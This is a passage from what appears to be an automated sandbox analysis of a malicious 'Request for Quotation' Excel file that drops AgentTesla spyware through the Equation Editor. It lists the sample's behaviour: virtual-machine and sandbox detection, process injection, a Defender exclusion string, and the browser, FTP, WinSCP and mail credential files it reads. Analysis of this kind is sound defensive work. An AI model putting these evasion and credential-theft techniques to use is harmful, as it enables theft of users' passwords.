                      Source: 4.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Request for Quotation (RFQ).xlsxJump to behavior
                      Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\iEPRTNxcoChyZ
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD5D5.tmpJump to behavior
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                      Source: Request for Quotation (RFQ).xlsxMetadefender: Detection: 28%
                      Source: Request for Quotation (RFQ).xlsxReversingLabs: Detection: 34%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: Request for Quotation (RFQ).xlsxStatic file information: File size 1262080 > 1048576
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: NativeObjectSecurity.pdb( source: vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.dr
                      Source: Binary string: NativeObjectSecurity.pdb source: vbc.exe, vbc.exe.2.dr
                      Source: Request for Quotation (RFQ).xlsxInitial sample: OLE indicators vbamacros = False
                      Source: Request for Quotation (RFQ).xlsxInitial sample: OLE indicators encrypted = True
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_00908194 push 20060002h; retf
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_00461568 push FFFFFF8Bh; retf
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F18998 push eax; retf 002Fh
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F18351 push esp; retf 002Fh
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_01F14293 push esp; retf 002Fh
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00908194 push 20060002h; retf
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00231335 pushfd ; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00231390 pushfd ; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.66771174726
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dan[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: Request for Quotation (RFQ).xlsxStream path 'EncryptedPackage' entropy: 7.99983327297 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2904, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9258
                      Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 489
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2716Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2836Thread sleep time: -104613s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2984Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2440Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2956Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2956Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2288Thread sleep count: 9258 > 30
                      Source: C:\Users\Public\vbc.exe TID: 2288Thread sleep count: 489 > 30
                      Source: C:\Users\Public\vbc.exe TID: 2956Thread sleep count: 101 > 30
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 104613
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                      Source: vbc.exe, 00000005.00000002.2351141721.0000000000B70000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: vbc.exe, 00000005.00000002.2351141721.0000000000B70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: vbc.exe, 00000005.00000002.2351141721.0000000000B70000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2904, type: MEMORY
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2904, type: MEMORY
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.32e8200.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information21Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSSecurity Software Discovery211Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
